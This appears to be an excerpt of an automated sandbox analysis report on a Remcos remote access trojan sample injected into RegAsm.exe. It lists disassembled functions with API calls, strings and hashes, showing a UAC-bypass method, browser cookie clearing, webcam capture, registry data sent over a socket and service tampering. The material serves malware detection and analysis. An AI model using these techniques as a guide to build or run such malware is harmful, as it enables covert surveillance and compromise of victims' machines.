                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                  Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: xUG$NG$NG$TG
                                                  • API String ID: 3114080316-2811732169
                                                  • Opcode ID: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                  • Opcode Fuzzy Hash: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                  Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 37874593-122982132
                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                  Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: dc140ff0ad8dbd1b4c4f2402beb5034a0b843679da805c5092eb68dbd5419f07
                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                  • Opcode Fuzzy Hash: dc140ff0ad8dbd1b4c4f2402beb5034a0b843679da805c5092eb68dbd5419f07
                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                  Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                  Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                  • _free.LIBCMT ref: 00450FC8
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450FD3
                                                  • _free.LIBCMT ref: 00450FDE
                                                  • _free.LIBCMT ref: 00451032
                                                  • _free.LIBCMT ref: 0045103D
                                                  • _free.LIBCMT ref: 00451048
                                                  • _free.LIBCMT ref: 00451053
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                  Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                  • int.LIBCPMT ref: 004111BE
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: (mG
                                                  • API String ID: 2536120697-4059303827
                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                  Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                  Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  • CoUninitialize.OLE32 ref: 00407664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-1839356972
                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                  Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                  Strings
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                  • UserProfile, xrefs: 0040BAE8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                  • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                  Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocConsole.KERNEL32 ref: 0041CE35
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AllocOutputShowWindow
                                                  • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                  • API String ID: 2425139147-3820604032
                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                  Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                  • __allrem.LIBCMT ref: 0043AD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                  Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                  • API String ID: 3469354165-3054508432
                                                  • Opcode ID: f1f6abde2fe9b8c9e3d75d7419095e2e3e0e7bba2c6e5661e2c4ad636e720d24
                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                  • Opcode Fuzzy Hash: f1f6abde2fe9b8c9e3d75d7419095e2e3e0e7bba2c6e5661e2c4ad636e720d24
                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                  Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                  • String ID:
                                                  • API String ID: 3950776272-0
                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                  Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                  • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                  Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                  Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • _free.LIBCMT ref: 004482CC
                                                  • _free.LIBCMT ref: 004482F4
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • _abort.LIBCMT ref: 00448313
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                  Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                  Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                  Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
